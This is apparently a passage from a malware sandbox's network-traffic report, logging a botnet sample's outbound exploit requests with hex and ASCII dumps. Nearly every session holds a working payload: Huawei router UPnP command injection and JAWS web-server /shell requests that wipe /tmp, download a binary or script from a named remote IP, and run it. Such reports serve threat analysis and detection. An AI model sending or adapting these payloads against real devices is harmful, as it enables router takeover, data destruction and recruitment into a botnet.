74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    437192.168.2.2344642156.23.230.6937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263437033 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    438192.168.2.235514441.0.162.7337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263478994 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    439192.168.2.2334470156.51.243.4737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263544083 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    440192.168.2.2337740156.108.129.8337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263597012 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    441192.168.2.235496241.163.26.21037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263650894 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    442192.168.2.235729441.24.234.23937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263690948 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    443192.168.2.234766841.148.200.18537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.263798952 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    444192.168.2.2348562177.213.21.17780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264769077 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    445192.168.2.2356736220.57.15.5880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264787912 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    446192.168.2.2345868205.243.6.9780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264842987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    447192.168.2.2348322191.89.47.23180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264883995 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    448192.168.2.2346744172.56.24.24480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264930010 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    449192.168.2.2350738175.110.145.20680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264950037 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    450192.168.2.234643053.177.52.18180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.264980078 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    451192.168.2.234724682.125.129.15280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265007973 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    452192.168.2.2333864167.84.216.17780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265048981 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    453192.168.2.2349604174.123.70.5580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265079021 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    454192.168.2.233635050.74.213.18180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265105963 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    455192.168.2.2351248171.183.227.12480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265151024 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    456192.168.2.2358618186.26.240.19780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265177011 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    457192.168.2.2339394196.27.40.19980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265213013 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    458192.168.2.234552098.85.212.15880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265263081 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    459192.168.2.2343646105.69.202.22080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265306950 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    460192.168.2.2357236157.210.196.21380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265326023 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    461192.168.2.2349782102.116.45.4380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265357018 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    462192.168.2.2355890201.27.217.10680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.265381098 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


